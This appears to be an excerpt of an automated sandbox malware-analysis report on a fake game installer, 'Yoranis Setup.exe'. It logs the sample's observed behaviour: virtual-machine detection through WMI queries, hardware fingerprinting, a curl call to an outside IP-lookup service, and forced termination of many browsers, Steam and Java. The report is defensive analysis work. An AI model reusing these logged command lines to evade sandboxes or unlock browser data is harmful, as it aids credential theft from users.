Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9910
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\win-version-info\prebuilds\win32-ia32\node.napi.nodeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\registry-js\build\Release\registry.nodeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\win-version-info\prebuilds\win32-x64\node.napi.nodeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\dxcompiler.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\SpiderBanner.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\StdUtils.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\dxcompiler.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060Thread sleep count: 9910 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010409Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010409
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpackedJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resourcesJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modulesJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\registry-js\buildJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\localesJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\registry-jsJump to behavior
Source: curl.exe, 0000000E.00000003.330302063852.00000201D98E1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.330302534079.00000201D98E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

barindex
Excessive usage of taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /FJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F
Source: C:\Users\user\Desktop\Yoranis Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq YoransSetup.exe" /FO csv | "C:\Windows\system32\find.exe" "YoransSetup.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq YoransSetup.exe" /FO csv Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "YoransSetup.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1664 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --mojo-platform-channel-handle=2404 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"Jump to behavior
